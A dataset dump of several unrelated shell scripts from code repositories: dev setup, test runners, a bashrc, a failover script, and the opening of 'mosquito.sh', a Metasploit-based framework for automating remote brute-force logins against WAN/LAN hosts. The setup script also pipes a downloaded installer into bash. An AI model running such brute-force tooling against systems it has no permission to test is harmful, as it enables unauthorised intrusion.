blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
---|---|---|---|---|---|---|---|---|---|---|---|
01a4405d451f4c829b722b12cc0be56138e18ff1
|
Shell
|
terraref/workflow-pilot
|
/workflow_terra/wrappers/bin2tif.sh
|
UTF-8
| 527 | 2.609375 | 3 |
[] |
no_license
|
#!/bin/bash
set -e
set -x
IN_LEFT="$1"
IN_RIGHT="$2"
IN_META="$3"
OUT_LEFT="$4"
OUT_RIGHT="$5"
OUT_META="$6"
TIMESTAMP="$7"
FIXED_META="$8"
# TODO: Deal with this...
# TODO: cp: cannot stat 'ua-mac/Level_1/rgb_geotiff/2018-07-01/2018-07-01__08-35-45-218/rgb_geotiff_L1_ua-mac_2018-07-01__08-35-45-218_left.tif': No such file or directory
OUT_DIR="."
export BETYDB_LOCAL_CACHE_FOLDER=$PWD
export SENSOR_METADATA_CACHE=$PWD/ua-mac/sensor-metadata
./bin2tif.py -l "$IN_LEFT" -r "$IN_RIGHT" -m "$IN_META" -t "$TIMESTAMP" -o "$OUT_DIR"
| true |
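The TODO above records a cp failing because an expected GeoTIFF never appeared. A minimal guard, as a sketch (the *_left.tif/*_right.tif names are assumptions taken from the TODO, not from bin2tif.py's documented outputs), would fail the wrapper early when the converter produces nothing:

# Hypothetical guard: abort if bin2tif.py produced no outputs.
# An unmatched glob stays literal here, so -e correctly fails for it too.
for f in "$OUT_DIR"/*_left.tif "$OUT_DIR"/*_right.tif; do
    if [ ! -e "$f" ]; then
        echo "expected output missing: $f" >&2
        exit 1
    fi
done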
d57cc6056e39288fef838f3ac52484dd5fc97507
|
Shell
|
MChartier/DevConfig
|
/setup-linux.sh
|
UTF-8
| 1,909 | 3.75 | 4 |
[] |
no_license
|
#!/bin/bash
#
# setup-linux.sh
# Set up new Linux environment.
#
readonly DOTNET_SDK_VERSIONS=(3.1 5.0)
if (( EUID != 0 )); then
echo "This script must be run as root." 1>&2
exit 1
fi
# Upgrade system packages
apt update && apt upgrade
# Install common tools
apt install make
#
# Install 'Oh my Posh'
# https://ohmyposh.dev/docs/installation
#
# Install dependencies
apt install unzip
# Installation
wget https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/posh-linux-amd64 -O /usr/local/bin/oh-my-posh
chmod +x /usr/local/bin/oh-my-posh
# Download the themes
mkdir ~/.poshthemes
wget https://github.com/JanDeDobbeleer/oh-my-posh/releases/latest/download/themes.zip -O ~/.poshthemes/themes.zip
unzip -o ~/.poshthemes/themes.zip -d ~/.poshthemes
chmod u+rw ~/.poshthemes/*.json
rm ~/.poshthemes/themes.zip
# Update bash.rc and reload
echo 'eval "$(oh-my-posh --init --shell bash --config ~/.poshthemes/powerline.omp.json)"' >> ~/.bashrc
. ~/.bashrc
#
# Install emacs
#
add-apt-repository ppa:kelleyk/emacs -y
apt update
apt install emacs -y
cp ./emacs/.emacs ~/.emacs
#
# Configure git
#
cp ./git/.gitconfig ~/.gitconfig
#
# Install dotnet SDKs
#
wget https://packages.microsoft.com/config/ubuntu/20.10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb && apt update
rm ./packages-microsoft-prod.deb
apt install -y apt-transport-https && apt update
for v in "${DOTNET_SDK_VERSIONS[@]}"; do
apt install -y dotnet-sdk-$v
done
#
# Install NVM and latest LTS Node.js SDK
# https://github.com/nvm-sh/nvm#install--update-script
#
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
export NVM_DIR="$HOME/.nvm"
# This loads nvm
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
# This loads nvm bash_completion
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
nvm install --lts
| true |
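apt and the curl-pipe installers above can fail partway through without stopping the script. A short post-install check, as a sketch (the tool list mirrors what this script installs; none of it is required by the script itself):

# Sketch: confirm each installed tool is now on PATH.
for tool in make unzip oh-my-posh emacs dotnet node; do
    if command -v "$tool" >/dev/null 2>&1; then
        echo "OK: $tool"
    else
        echo "MISSING: $tool" >&2
    fi
done
dotnet --list-sdks   # expect one entry per element of DOTNET_SDK_VERSIONS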
36cb65ef6b4f7f12b1f3550b3a9cf81079420110
|
Shell
|
MindFaktur/bridgelabz-shell
|
/shell_scripts/nov01/practice/first_pdf/harmonic.sh
|
UTF-8
| 148 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/bash
read -p "enter a number: " num
harNum=0
for ((i=1;i<=$num;i++))
do
harNum=`awk "BEGIN {print $harNum + (1/$i)}"`
done
echo $harNum
| true |
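Bash arithmetic is integer-only, which is why the loop above shells out to awk on every iteration. The whole sum can be computed in a single awk process instead, a sketch:

#!/bin/bash
# Sketch: n-th harmonic number in one awk call, no per-iteration fork.
read -p "enter a number: " num
awk -v n="$num" 'BEGIN { h = 0; for (i = 1; i <= n; i++) h += 1 / i; print h }'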
34d5c0fb293b06d3fd1a906b60e3c76f97f7081b
|
Shell
|
eros902002/prebid-mobile-android
|
/testprebid.sh
|
UTF-8
| 1,442 | 2.65625 | 3 |
[
"Apache-2.0"
] |
permissive
|
#! /bin/bash
function echoX {
echo -e "PREBID TESTLOG: $@"
}
echoX "start unit tests"
cd PrebidMobile
./gradlew clean test
echoX "assemble debug apk"
./gradlew clean assembleDebug
if [ ! -e DemoApp/build/outputs/apk/debug/DemoApp-debug.apk ]; then
echoX "apk creation unsuccessful"
fi
echoX "copy debug apk to destination path"
mkdir -p IntegrationTests/apk && cp DemoApp/build/outputs/apk/debug/DemoApp-debug.apk IntegrationTests/apk/DemoApp.apk
if [ ! -e IntegrationTests/apk/DemoApp.apk ]; then
echoX "file copy unsuccessful"
fi
# Commenting Integration tests out, running it locally only for now since it requires login
# echoX "start integration tests"
# cd IntegrationTests
# bundle install
# npm install -g appcenter-cli
# gem install xamarin-test-cloud
# bundle exec calabash-android resign apk/DemoApp.apk
# bundle exec calabash-android build apk/DemoApp.apk
# #bundle exec test-cloud submit apk/DemoApp.apk 435c130f3f6ff5256d19a790c21dd653 --devices 2ae0b5a0 --series "master" --locale "en_US" --app-name "DemoApp" --user [email protected]
# # bundle exec test-cloud submit apk/DemoApp.apk 435c130f3f6ff5256d19a790c21dd653 --devices b2a05af9 --series "master" --locale "en_US" --app-name "DemoApp" --user [email protected]
# appcenter login
# appcenter test run calabash --app "xtc-AppNexus/DemoApp" --devices "xtc-AppNexus/test-demo-app" --app-path apk/DemoApp.apk --test-series "master" --locale "en_US" --project-dir IntegrationTests/features
| true |
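The two existence checks above print a diagnostic but let the script continue, so CI would still see a zero exit status. A fail-fast variant of the same checks, as a sketch reusing the script's echoX helper:

# Sketch: same checks, but fatal on failure.
apk=DemoApp/build/outputs/apk/debug/DemoApp-debug.apk
if [ ! -e "$apk" ]; then
    echoX "apk creation unsuccessful"
    exit 1
fi
mkdir -p IntegrationTests/apk
cp "$apk" IntegrationTests/apk/DemoApp.apk || { echoX "file copy unsuccessful"; exit 1; }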
fa9b741a3cd7fefa44b45e01a2bbdc0f329c4f19
|
Shell
|
dia38/walt-python-packages
|
/dev/tools/functions.sh
|
UTF-8
| 134 | 2.859375 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
do_subpackages()
{
for subpackage in $SUBPACKAGES
do
cd "$subpackage"
"$@"
cd ..
done
}
| true |
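do_subpackages runs an arbitrary command inside every directory named in $SUBPACKAGES. A usage sketch (the subpackage names and command are hypothetical), plus a subshell variant that cannot leave the caller stranded in a subdirectory if a command fails:

# Hypothetical usage:
SUBPACKAGES="client server common"
do_subpackages make test
# Subshell variant: each cd is confined to its own iteration.
do_subpackages_safe()
{
    for subpackage in $SUBPACKAGES
    do
        ( cd "$subpackage" && "$@" )
    done
}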
95f8d85021a149a352419ced323ea8cf264b917a
|
Shell
|
opencitymodel/data-pipeline
|
/grid-and-attrs/grid-state.sh
|
UTF-8
| 324 | 2.53125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
SOURCE_DIR=$1
DESTINATION_DIR=$2
GEOCODE_DIR=$3
STATE=$4
# reorg the shapefiles into grids and attach some useful attributes
# --max-old-space-size=8192
node app.js -s ${STATE} -i ${SOURCE_DIR}/${STATE}.txt -o ${DESTINATION_DIR} -c ${GEOCODE_DIR}/county.geo.txt -m ${GEOCODE_DIR}/${STATE}-grid-to-counties.txt
| true |
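The script assumes all four positional arguments are supplied; with any of them empty, node receives malformed flags and fails with a far less obvious error. A guard at the top, as a sketch:

# Sketch: validate arguments before invoking node.
if [ $# -ne 4 ]; then
    echo "usage: $0 SOURCE_DIR DESTINATION_DIR GEOCODE_DIR STATE" >&2
    exit 1
fi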
0d5da7c6f7a7205aca8e67be73c28a7962941d65
|
Shell
|
HMinng/script
|
/Spamd.sh
|
UTF-8
| 218 | 2.640625 | 3 |
[] |
no_license
|
#!/bin/bash
# @describe:
# @author: Ming He([email protected])
process='cli.php'
num=$(ps -elf | grep $process | grep -v grep | wc -l);
if [ "$num" -eq 0 ]; then
php public/cli.php request_uri="/anticheat/index" &
fi
| true |
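The ps|grep|grep -v grep|wc -l pipeline is the classic liveness probe; pgrep expresses the same test directly, as a sketch (assuming procps pgrep, where -f matches against the full command line):

#!/bin/bash
# Sketch: the same watchdog with pgrep.
process='cli.php'
if ! pgrep -f "$process" > /dev/null; then
    php public/cli.php request_uri="/anticheat/index" &
fi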
6be8b336e59c7cbea5ee6a32ff6db231a3b28d5b
|
Shell
|
hermeseagel/shellscript
|
/Python_script/shell_ha.sh
|
UTF-8
| 2,356 | 3.015625 | 3 |
[] |
no_license
|
#!/usr/bin/ksh
hbping_primary=8.8.8.8
hbping_gateway=10.1.1.1
check_process='pmon'
hbping_standby=''
vgname=''
migration_dirs=(/oracle /data)
loggerdirs=''
logfile=''
function testping_p {
#check Primary network status
#if neither the primary nor the gateway can be reached, the standby's own network likely has a problem
#if the gateway answers but the primary does not, the primary itself is likely down
p_status=`ping -c 5 $hbping_primary | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
g_status=`ping -c 5 $hbping_gateway | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
if [ "$p_status" == "Failed" ] && [ "$g_status" == "Failed" ]; then
echo 'Gateway and remote partner cannot be reached'
fi
}
function check_pmon {
ps -ef | grep -i $check_process |grep -v grep | awk '{ print $1,$(NF) }'
}
function removevg_primary {
for dir in "${migration_dirs[@]}"
do
check_fs=`fuser "$dir" 2>/dev/null | awk ' {print NF} ' `
if [ "${check_fs:-0}" -eq 0 ]; then
umount $dir
varyoffvg $vgname
exportvg $vgname
elif [ "${check_fs:-0}" -lt 2 ]; then
fuser -ck $dir
umount $dir
else
echo 'Stop umount'
echo 'please check process all kill'
fi
done
}
function testping_s {
#check standby Server network
#if neither the partner nor the gateway can be reached, this server's own network likely has a problem
#if the gateway answers but the partner does not, the partner itself is likely down
#s_status: remote partner network status
#g_status: gateway network status
s_status=`ping -c 5 $1 | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
g_status=`ping -c 5 $2 | awk "/packet loss/" | awk -F", " '{ if($3== "0% packet loss") print "Pass";else print "Failed" }' `
if [ "$s_status" == "Failed" ] && [ "$g_status" == "Failed" ]; then
msg="Gateway and remote partner cannot be reached. Check the settings in this script, or check your local ethernet"
elif [ "$s_status" == "Pass" ] && [ "$g_status" == "Failed" ]; then
msg="Gateway cannot be reached, but partner is reachable."
elif [ "$s_status" == "Failed" ] && [ "$g_status" == "Pass" ]; then
msg="Partner cannot be reached, but gateway is fine."
fi
echo "$msg"
}
ping_result=$(testping_s $hbping_primary $hbping_gateway)
echo $ping_result
| true |
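testping_p and testping_s duplicate the same ping-and-parse pipeline four times. A shared helper, as a sketch in the script's own style, would reduce that to one definition:

# Sketch: one probe, reused for primary, standby and gateway checks.
function ping_status {
    #prints "Pass" when 5 pings report 0% packet loss, "Failed" otherwise
    ping -c 5 "$1" | awk "/packet loss/" | awk -F", " '{ if ($3 == "0% packet loss") print "Pass"; else print "Failed" }'
}
# usage: g_status=$(ping_status "$hbping_gateway")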
97bc94663b9cf1ebe822e1a2bff9bf7a0a8abe3c
|
Shell
|
fakeNetflix/uber-repo-peloton
|
/tools/packaging/docker-push.sh
|
UTF-8
| 1,027 | 4.4375 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Takes a list of images (built locally) like uber/peloton:foo123, and tags and
# pushes to some registries.
#
# Usage:
# ./docker-push [registry] [image1] [image2]
if [[ $# -lt 2 ]] ; then
echo "No registry and image passed" >&2
exit 1
fi
# first argument is registry
REGISTRY=${1}
[[ $(uname) == Darwin || -n ${JENKINS_HOME} ]] && docker_cmd='docker' || docker_cmd='sudo docker'
# second argument onwards are images
for image in "${@:2}" ; do
echo "Pushing $image to ${REGISTRY}..."
new_image="vendor/peloton"
# pull version from the image, assume latest if not present
ver="${image##*:}"
if [[ "$ver" != "$image" ]] ; then
version="${ver:-latest}"
else
version="latest"
fi
push_target="${REGISTRY}/${new_image}:${version}"
${docker_cmd} tag "${image}" "${push_target}";
if ${docker_cmd} push "${push_target}"; then
echo "The image can now be pulled from docker registry at ${REGISTRY}"
else
echo "Failed to push image to registry"
exit 1
fi
done
| true |
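The tag is split from the image reference with ${image##*:}, which deletes everything up to and including the last colon; when no colon exists the expansion returns the input unchanged, which is exactly what the != test above detects. A quick demonstration, as a sketch:

# Sketch: behavior of the tag extraction above.
image="uber/peloton:foo123"
echo "${image##*:}"              # -> foo123
image="uber/peloton"             # no tag present
ver="${image##*:}"               # -> uber/peloton, unchanged
[ "$ver" != "$image" ] || echo "no tag found, script falls back to latest"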
04ece76fc7c8569396d890ea48d996f2ec3e748c
|
Shell
|
mp3splt/mp3splt-web
|
/mp3splt-project/branches/mp3splt-project_0.7.3__2.4.3/tests/mp3_freedb_mode_tests.sh
|
UTF-8
| 3,011 | 3.5625 | 4 |
[] |
no_license
|
#!/bin/bash
. ./utils.sh || exit 1
function _test_freedb_search_get_cgi_tracktype
{
get_type=$1
get_url=$2
get_port=$3
rm -f query.cddb
remove_output_dir
M_FILE="La_Verue__Today"
expected=" Processing file 'songs/La_Verue__Today.mp3' ...
Freedb search type: cddb_cgi , Site: tracktype.org/~cddb/cddb.cgi , Port: 80
Freedb get type: $get_type , Site: $get_url , Port: $get_port
Search string: hacking the future
Searching from tracktype.org/~cddb/cddb.cgi on port 80 using cddb_cgi ...
freedb search processed
Getting file from $get_url on port $get_port using $get_type ...
freedb file downloaded
reading informations from CDDB file query.cddb ...
Artist: Various
Album: Hacking The Future
Tracks: 37
cddb file processed
info: file matches the plugin 'mp3 (libmad)'
info: found Xing or Info header. Switching to frame mode...
info: MPEG 1 Layer 3 - 44100 Hz - Joint Stereo - FRAME MODE - Total time: 4m.05s
info: starting normal split
File \"$OUTPUT_DIR/Various - 01 - The Body Electronic Spews.mp3\" created
File \"$OUTPUT_DIR/Various - 02 - I will tell U 3 things.mp3\" created
File \"$OUTPUT_DIR/Various - 03 - Spew Culture.mp3\" created
Processed 9402 frames - Sync errors: 0
file split (EOF)"
freedb_album_search="hacking the future"
freedb_search="search=cddb_cgi://tracktype.org/~cddb/cddb.cgi:80"
freedb_get="get=$get_type://$get_url:$get_port"
freedb_options="query[$freedb_search,$freedb_get]{$freedb_album_search}(0)"
mp3splt_args="-d $OUTPUT_DIR -q -c \"$freedb_options\" $MP3_FILE"
run_check_output "$mp3splt_args" "$expected"
current_file="$OUTPUT_DIR/Various - 01 - The Body Electronic Spews.mp3"
check_current_mp3_length "00.37"
current_file="$OUTPUT_DIR/Various - 02 - I will tell U 3 things.mp3"
check_current_mp3_length "03.15"
current_file="$OUTPUT_DIR/Various - 03 - Spew Culture.mp3"
check_current_mp3_length "00.12"
print_ok
echo
}
function test_freedb_search_get_cgi_tracktype
{
test_name="freedb mode - search & get cgi tracktype"
_test_freedb_search_get_cgi_tracktype "cddb_cgi" "tracktype.org/~cddb/cddb.cgi" "80"
}
function test_freedb_search_tracktype_get_cgi_freedb
{
test_name="freedb mode - search tracktype & get cgi freedb"
_test_freedb_search_get_cgi_tracktype "cddb_cgi" "freedb.org/~cddb/cddb.cgi" "80"
}
function test_freedb_search_tracktype_get_cddb_protocol_freedb
{
test_name="freedb mode - search tracktype & get cddb protocol freedb"
_test_freedb_search_get_cgi_tracktype "cddb_protocol" "freedb.org" "8880"
}
function run_freedb_mode_tests
{
p_blue " FREEDB tests ..."
echo
freedb_mode_test_functions=$(declare -F | grep " test_freedb" | awk '{ print $3 }')
for test_func in $freedb_mode_test_functions;do
eval $test_func
done
p_blue " FREEDB tests DONE."
echo
}
#main
export LC_ALL="C"
start_date=$(date +%s)
run_freedb_mode_tests
p_failed_tests
end_date=$(date +%s)
p_time_diff_cyan $start_date $end_date "\t"
echo -e '\n'
exit 0
| true |
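run_freedb_mode_tests discovers its cases by listing every defined function and filtering on the test_freedb prefix, so adding a test only requires defining a conventionally named function. The discovery pattern in isolation, as a sketch:

# Sketch: auto-discover and run all functions named test_*.
test_alpha() { echo "alpha ran"; }
test_beta()  { echo "beta ran"; }
for fn in $(declare -F | awk '$3 ~ /^test_/ { print $3 }'); do
    "$fn"
done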
a222ee63c383540353724279398d3d27c3c8bca2
|
Shell
|
stringlytyped/dotfiles
|
/bashrc
|
UTF-8
| 3,037 | 2.921875 | 3 |
[
"Apache-2.0"
] |
permissive
|
#
# \`.|\..----...-'` `-._.-'_.-'`
# / ' ` , __.--'
# )/' _/ \ `-_, /
# `-'" `"\_ ,_.-;_.-\_ ', fsc/as
# _.-'_./ {_.' ; /
# {_.-``-' {_/
#
# https://github.com/stringlytyped/dotfiles
#
# BASHRC
# Configures non-login interactive shells
#
# Paths
# -------------------------------------------------------------- #
PATH="$HOME/bin:/usr/local/opt/[email protected]/bin:$(go env GOPATH)/bin:$(brew --prefix coreutils)/libexec/gnubin:$(brew --prefix findutils)/libexec/gnubin:$(brew --prefix grep)/libexec/gnubin:$PATH"
MANPATH="$(brew --prefix coreutils)/libexec/gnuman:$(brew --prefix findutils)/libexec/gnuman:$(brew --prefix grep)/libexec/gnuman:$MANPATH"
export PATH MANPATH
# Other exports
# -------------------------------------------------------------- #
export EDITOR='nano'
export LC_CTYPE="utf-8"
export LC_ALL=en_US.UTF-8
export LANG=en_US.UTF-8
# Configure macOS' built-in ls command to print colours
export CLICOLOR=1
export LSCOLORS=GxFxCxDxBxegedabagaced
# Set options
# -------------------------------------------------------------- #
# Prevent files from being accidentally overwritten when using a > redirect
# See http://www.linuxhowtos.org/Tips%20and%20Tricks/Protecting%20files%20with%20noclobber.htm
set -o noclobber
# Enable pyenv shims
# -------------------------------------------------------------- #
# See https://github.com/pyenv/pyenv
if command -v pyenv 1>/dev/null 2>&1; then
eval "$(pyenv init -)"
fi
# Powerline prompt
# -------------------------------------------------------------- #
# See https://github.com/powerline/powerline
powerline_script=~/.pyenv/versions/3.6.5/lib/python3.6/site-packages/powerline/bindings/bash/powerline.sh
if [[ -f "$powerline_script" ]]; then
powerline-daemon -q
POWERLINE_BASH_CONTINUATION=1
POWERLINE_BASH_SELECT=1
# shellcheck source=/Users/JS/.pyenv/versions/3.6.5/lib/python3.6/site-packages/powerline/bindings/bash/powerline.sh
source "$powerline_script"
fi
# Aliases
# -------------------------------------------------------------- #
alias ls='ls --color=auto -F'
# F: add classifiers to end of entries
alias ll='ls --color=auto -lFh'
# l: use long-listing format
# F: add classifiers to end of entries
# h: print file sizes in human-readable form
alias git='hub'
# https://hub.github.com/
alias weather='weather --units ca'
# https://github.com/genuinetools/weather
alias grep='grep --color=auto'
alias mkdir='mkdir -pv'
alias edit='open -a "Visual Studio Code"'
alias reload='bind -f ~/.inputrc; source ~/.bash_profile'
alias server='python3 -m http.server'
alias pgstart='pg_ctl -D /usr/local/var/postgres start'
alias pgstop='pg_ctl -D /usr/local/var/postgres stop'
alias cd..='cd ..'
alias cd~='cd ~'
alias ..='cd ..'
alias ...='cd ../../'
alias ....='cd ../../../'
alias .....='cd ../../../../'
alias ......='cd ../../../../../'
alias ..1='cd ..'
alias ..2='cd ../../'
alias ..3='cd ../../../'
alias ..4='cd ../../../../'
alias ..5='cd ../../../../../'
alias ~='cd ~'
| true |
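With noclobber set, a plain > redirect refuses to overwrite an existing file; the >| operator is the deliberate escape hatch. A sketch:

# Sketch: noclobber in practice.
set -o noclobber
echo one > /tmp/demo.txt
echo two > /tmp/demo.txt     # fails: bash: /tmp/demo.txt: cannot overwrite existing file
echo two >| /tmp/demo.txt    # explicit overwrite still allowed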
a7232b70fdf932ac18c5e0f747f8c9e30aac0729
|
Shell
|
NTgitdude23/resource_files
|
/mosquito.sh
|
UTF-8
| 44,856 | 3.484375 | 3 |
[] |
no_license
|
#!/bin/sh
# Author: r00t-3xp10it
# mosquito framework v:3.12.3 [STABLE]
# Automate remote brute force tasks over WAN/LAN networks
# GitHub: https://github.com/r00t-3xp10it/resource_files
# Suspicious Shell Activity - redteam @2019
##
resize -s 38 120 > /dev/null
# variable declarations _______________________________________
# |
OS=`uname` # grab OS
ver="3.12.3" # mosquito version
SaIU=`arch` # grab arch in use
IPATH=`pwd` # grab mosquito path
htn=$(hostname) # grab hostname
DiStRo=`awk '{print $1}' /etc/issue` # grab distribution - Ubuntu or Kali
user=`who | awk {'print $1'}` # grab username
EnV=`hostnamectl | grep Chassis | awk {'print $2'}` # grab environement
InT3R=`netstat -r | grep "default" | awk {'print $8'}` # grab interface in use
RANGE=`ifconfig $InT3R | egrep -w "inet" | awk {'print $2'} | cut -d '.' -f1,2,3` # ip-range parsing
# ____________________________________________________________|
# sellect attacker arch in use
if [ "$SaIU" = "i686" ] || [ "$SaIU" = "x86" ]; then
ArCh="x86"
else
ArCh="x64"
fi
## Colorise shell Script outputs
Colors() {
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
}
Colors;
## Make sure we are in 'resource_files' working directory
if ! [ -e "logs" ]; then
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ ___(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 🦟
!
echo ""${Reset};
cat << !
Before we are able to install/execute mosquito, we need to download
the 🦟mosquito working directory to our machine first and then run it.
!
echo " ${BlueF}[${YellowF}execute${BlueF}]${white} sudo git clone https://github.com/r00t-3xp10it/resource_files.git"
echo " ${BlueF}[${YellowF}execute${BlueF}]${white} cd resource_files && sudo chmod +x -R *.sh"
echo " ${BlueF}[${YellowF}execute${BlueF}]${white} sudo ./mosquito.sh -h"
echo "" && echo "---"
sleep 1
exit
fi
## Arguments menu
time=$(date | awk {'print $4'})
while getopts ":hui" opt; do
case $opt in
u)
cd aux && ./install.sh -u # update (install.sh -u)
exit
;;
i)
cd aux && ./install.sh # install dependencies (install.sh)
exit
;;
h)
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ ___(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 🦟
!
echo ""${Reset};
echo "${BlueF} ${RedF}:${BlueF}Framework Description_"${Reset};
cat << !
Mosquito uses metasploit auxiliary modules + nmap nse + resource files
to be able to automate remote brute force tasks over WAN/LAN networks.
'scan Local Lan, scan user inputs (rhosts),Search WAN for random hosts'
!
echo "${BlueF} ${RedF}:${BlueF}Framework Info_"${Reset};
cat << !
Author: r00t-3xp10it
Suspicious Shell Activity🦟redteam @2019🦟
https://github.com/r00t-3xp10it/resource_files
!
echo "${BlueF} ${RedF}:${BlueF}Dependencies_"${Reset};
cat << !
zenity|metasploit|nmap|dig|geoiplookup|http-winrm.nse
curl|freevulnsearch.nse|multi_services_wordlist.txt
!
echo "${BlueF} ${RedF}:${BlueF}Limitations_"${Reset};
cat << !
a) mosquito accepts only ip addr inputs, not domain names
b) brute force takes time, use 'CTRL+C' to abort scan(s)
c) mosquito dictionaries can be found under bin/wordlists
d) finding valid creds sometimes fails to spawn a shell
e) having multiple sessions open might slow down your pc
!
echo "${BlueF} ${RedF}:${BlueF}Install/Update_"${Reset};
cat << !
cd resource_files
find ./ -name "*.sh" -exec chmod +x {} \;
update - sudo ./mosquito.sh -u
install - sudo ./mosquito.sh -i
!
echo "${BlueF} ${RedF}:${BlueF}Execution_"${Reset};
cat << !
sudo ./mosquito.sh
!
echo "---"
exit
;;
\?)
echo "${RedF}[x] Invalid option: -${white}$OPTARG"${Reset}; >&2
exit
;;
esac
done
## Make sure we have installed mosquito
if ! [ -f "aux/install.log" ]; then
echo "---"${BlueF}
cat << !
🦟__________
_______🦟________________________ __(_) _ /______🦟
__ __ __ \ __ \_ ___/ __ / / / /_ /_ __/ __ \\
🦟_ / / / / / /_/ /(__ )/ /_/ // /_/ /_ / / /_ / /_/ /
/_/ /_/ /_/\____//____/ \__, / \__,_/ /_/ \__/ \____/v:$ver
/_/ 🦟 🦟
!
echo ${white}"---${YellowF} 'Mosquito reports that it is ${RedF}not${YellowF} installed'."${Reset};
echo ""
echo -n "${BlueF}[${YellowF}i${BlueF}] Do you wish to install 🦟mosquito dependencies now? (y/n):"${Reset};read quer
if [ "$quer" = "y" ] || [ "$quer" = "Y" ]; then
cd aux && ./install.sh # install dependencies (install.sh)
fi
fi
###################################################################
# * 🦟 FRAMEWORK MAIN FUNCTIONS 🦟 * #
###################################################################
service postgresql start | zenity --progress --pulsate --title "🦟 PLEASE WAIT 🦟" --text="Starting postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
#
# geo_location funcion
#
sh_one () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} geo_location resource_"${Reset};
sleep 1
scan=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect scanning method" --radiolist --column "Pick" --column "Option" TRUE "Scan user inputs (rhosts)" FALSE "Scan user input host list (file.txt)" FALSE "Internal ip addr to external ip Resolver" --width 330 --height 200) > /dev/null 2>&1
#
## Sellect the type of scan to use
#
if [ "$scan" = "Scan user inputs (rhosts)" ]; then
rhost=$(zenity --entry --title "🦟 MOSQUITO 🦟" --text "Input rhosts separated by blank spaces\nExample: 162.246.22.133 104.96.180.140" --width 450) > /dev/null 2>&1
echo "${BlueF}[☠]${white} Scanning User input rhosts"${Reset};
packag=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect geolocation package" --radiolist --column "Pick" --column "Option" TRUE "Curl" FALSE "geoiplookup" --width 328 --height 175) > /dev/null 2>&1
if [ "$packag" = "Curl" ]; then
echo "${BlueF}[☠]${white} Using curl package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg USE_CURL true;setg RHOSTS $rhost;resource geo_location.rc;workspace -d mosquito"
else
echo "${BlueF}[☠]${white} Using geoiplookup package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg GOOGLE_MAP true;setg RHOSTS $rhost;resource geo_location.rc;workspace -d mosquito"
fi
#
# Scan user input host list (file.txt)
#
elif [ "$scan" = "Scan user input host list (file.txt)" ]; then
echo "${BlueF}[☠]${white} Scanning User input host list (file.txt)"${Reset};
list=$(zenity --title "🦟 MOSQUITO 🦟" --filename=$IPATH --file-selection --text "chose host list to use") > /dev/null 2>&1
packag=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect geolocation package" --radiolist --column "Pick" --column "Option" TRUE "Curl" FALSE "geoiplookup" --width 328 --height 175) > /dev/null 2>&1
if [ "$packag" = "Curl" ]; then
echo "${BlueF}[☠]${white} Using curl package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg USE_CURL true;setg TXT_IMPORT $list;resource geo_location.rc;workspace -d mosquito"
else
echo "${BlueF}[☠]${white} Using geoiplookup package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg GOOGLE_MAP true;setg TXT_IMPORT $list;resource geo_location.rc;workspace -d mosquito"
fi
#
# Internal ip addr to external ip Resolver (dig)
#
elif [ "$scan" = "Internal ip addr to external ip Resolver" ]; then
echo "${BlueF}[☠]${white} Resolving Internal ip addr to external ip"${Reset};
packag=$(zenity --list --title "🦟 MOSQUITO 🦟" --text "Sellect geolocation package" --radiolist --column "Pick" --column "Option" TRUE "Curl" FALSE "geoiplookup" --width 328 --height 175) > /dev/null 2>&1
if [ "$packag" = "Curl" ]; then
echo "${BlueF}[☠]${white} Using curl package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg USE_CURL true;setg RESOLVER true;resource geo_location.rc;workspace -d mosquito"
else
echo "${BlueF}[☠]${white} Using geoiplookup package to resolve"${Reset};
msfconsole -q -x "workspace -a mosquito;setg GOOGLE_MAP true;setg RESOLVER true;resource geo_location.rc;workspace -d mosquito"
fi
else
echo "${BlueF}[${RedF}x${BlueF}]${white} None option sellected, aborting 🦟Bzzzz.."${Reset};
sleep 2 && sh_main
fi
}
#
# brute_force most common services
#
sh_two () {
echo "${BlueF}[${YellowF}running${BlueF}]:${white} brute_force resource_"${Reset};
sleep 1
